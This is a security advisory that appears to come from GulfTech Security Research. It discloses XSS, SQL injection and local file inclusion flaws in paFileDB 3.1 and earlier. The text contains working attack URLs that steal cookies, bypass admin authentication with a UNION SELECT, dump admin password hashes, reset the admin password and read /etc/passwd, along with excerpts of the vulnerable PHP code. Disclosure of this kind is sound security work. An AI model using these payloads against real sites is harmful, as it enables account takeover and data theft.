Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
paFileDB Multiple Vulnerabilities
Vendor: php Arena
Product: paFileDB
Version: <= 3.1
Website: http://www.phparena.net/pafiledb.php
BID: 13967
CVE: CVE-2005-1999 CVE-2005-2000 CVE-2005-2001
OSVDB: 17473 17474 17475 17476
SECUNIA: 11489
PACKETSTORM: 38174
Description:
paFileDB is a popular open source web application offered by php Arena. paFileDB allows webmasters to open up an interactive file repository on their website. There are a number of vulnerabilities in paFileDB that may allow for an attacker to include arbitrary files, retrieve sensitive user and/or database information, and completely bypass admin, and team member authentication. Users should upgrade immediately.


Cross Site Scripting:
There are a number of cross site scripting issues in the paFileDB software. Majority of these cross site scripting issues stem from concatenated variables never being initialized.

http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the context of the victims browser, and in turn disclose sensitive information to an attacker.


SQL Injection:
There are a number of SQL Injection vulnerabilities in paFileDB, but it should be noted that to exploit these issues magic quotes gpc must be off. Also, magic quotes off seems to be the default php.ini settings now so I do consider these issues fairly high risk. The most serious of the SQL Injection issues lies in the administrative login.
if ($login == "do") 
{
	$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE 
        admin_username = '$formname'", 1);
	$formpw = md5($formpass);
	if ($formpw == $admin[admin_password]) 
	{
		$adminip = getenv ("REMOTE_ADDR");
		$ip = md5($adminip);
		$user = $formname;
		$pass = $formpw;

		if ($authmethod == "cookies") 
		{
			$cookiedata = "$ip|$formname|$formpw";
			setcookie("pafiledbcookie", $cookiedata);
		}

		header("Location: admin.php");
}

The variable $formname is taken directly from the submitted login form and executed in the query, so if magic quotes gpc an attacker can use UNION SELECT to bypass admin authentication!

http://pafiledb/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

The query above uses a UNION SELECT to get the admin username, id, email etc but we specify the password hash as the md5 encrypted value of the $formpass variable. This same issue applies to the team login, and also the auth.php scripts in the /teams/ and /admin/ directory.

There is also an SQL Injection vulnerability that will allow for team members to gain the administrative password hash and escalate their privileges to admin.

http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

Last but not least there is a SQL Injection vulnerability in search.php because the $string variable is never sanitized.

There is one SQL Injection issue in paFileDB that does not require magic_ quotes_gpc to be disabled. This particular issue will let a team member run any sql command that they like, including making themselves an admin.

http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

The above url would successfully set the admin password to 1337 if ran by a logged in team member or admin. This vulnerability exists because the $query variable is never declared before being concatenated so we can in turn hijack the $query variable and run any sql commands we like.


Local File Inclusion:
paFileDB is vulnerable to a local file inclusion vulnerability that may allow for an attacker to execute arbitrary local scripts, or read/access arbitrary files on the webserver. Let's look at pafiledb.php

if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }


The $action variable is never sanitized and vulnerable to directory traversal sequences.

http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

This vulnerability exists on all paFileDB configurations, as all GPC is extracted to global variables.


Solution:
A new version of paFileDB has been released, so upgrading is advised.


Credits:
James Bercegay of the GulfTech Security Research Team